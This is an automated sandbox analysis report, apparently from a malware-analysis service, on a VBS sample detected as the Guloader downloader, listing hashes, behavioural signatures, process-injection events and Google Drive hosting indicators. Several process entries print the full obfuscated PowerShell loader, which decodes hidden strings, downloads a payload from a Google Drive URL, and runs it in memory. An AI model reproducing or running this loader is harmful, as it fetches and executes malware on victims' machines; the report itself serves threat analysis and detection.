Analysis
-
max time kernel
147s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25/09/2024, 02:25
Static task
static1
Behavioral task
behavioral1
Sample
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
Resource
win10v2004-20240802-en
General
-
Target
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
-
Size
32KB
-
MD5
e198fb2a66ebacac2d2a06c6d39b578c
-
SHA1
ac1353658fffdfba77beaa6ce1c42254ba02346f
-
SHA256
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b
-
SHA512
4c28d4eee277d495d2596eeab0841933ac84f5f72b12f64d9281b4023f7e9c32f22d2368bb634252fdcac4f2b79b5cfe32cdbff015f4dc8a2c6f6acdb1317fe5
-
SSDEEP
384:3PA0Xp74bQBupq5CMat1f9wxdaW+e9FfXpcHIBSi8g:/bFsq5CHePaWB9FfXp9Si8g
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 1952 WScript.exe 7 2236 powershell.exe 9 2236 powershell.exe -
pid Process 2236 powershell.exe 2584 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 11 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2768 wabmig.exe 2768 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2584 powershell.exe 2768 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2584 set thread context of 2768 2584 powershell.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2584 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2236 powershell.exe 2584 powershell.exe 2584 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2768 wabmig.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1952 wrote to memory of 2236 1952 WScript.exe 30 PID 1952 wrote to memory of 2236 1952 WScript.exe 30 PID 1952 wrote to memory of 2236 1952 WScript.exe 30 PID 2236 wrote to memory of 2900 2236 powershell.exe 32 PID 2236 wrote to memory of 2900 2236 powershell.exe 32 PID 2236 wrote to memory of 2900 2236 powershell.exe 32 PID 2236 wrote to memory of 2588 2236 powershell.exe 34 PID 2236 wrote to memory of 2588 2236 powershell.exe 34 PID 2236 wrote to memory of 2588 2236 powershell.exe 34 PID 2588 wrote to memory of 2584 2588 cmd.exe 35 PID 2588 wrote to memory of 2584 2588 cmd.exe 35 PID 2588 wrote to memory of 2584 2588 cmd.exe 35 PID 2588 wrote to memory of 2584 2588 cmd.exe 35 PID 2584 wrote to memory of 2112 2584 powershell.exe 37 PID 2584 wrote to memory of 2112 2584 powershell.exe 37 PID 2584 wrote to memory of 2112 2584 powershell.exe 37 PID 2584 wrote to memory of 2112 2584 powershell.exe 37 PID 2584 wrote to memory of 2768 2584 powershell.exe 38 PID 2584 wrote to memory of 2768 2584 powershell.exe 38 PID 2584 wrote to memory of 2768 2584 powershell.exe 38 PID 2584 wrote to memory of 2768 2584 powershell.exe 38 PID 2584 wrote to memory of 2768 2584 powershell.exe 38 PID 2584 wrote to memory of 2768 2584 powershell.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"3⤵PID:2900
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"3⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod 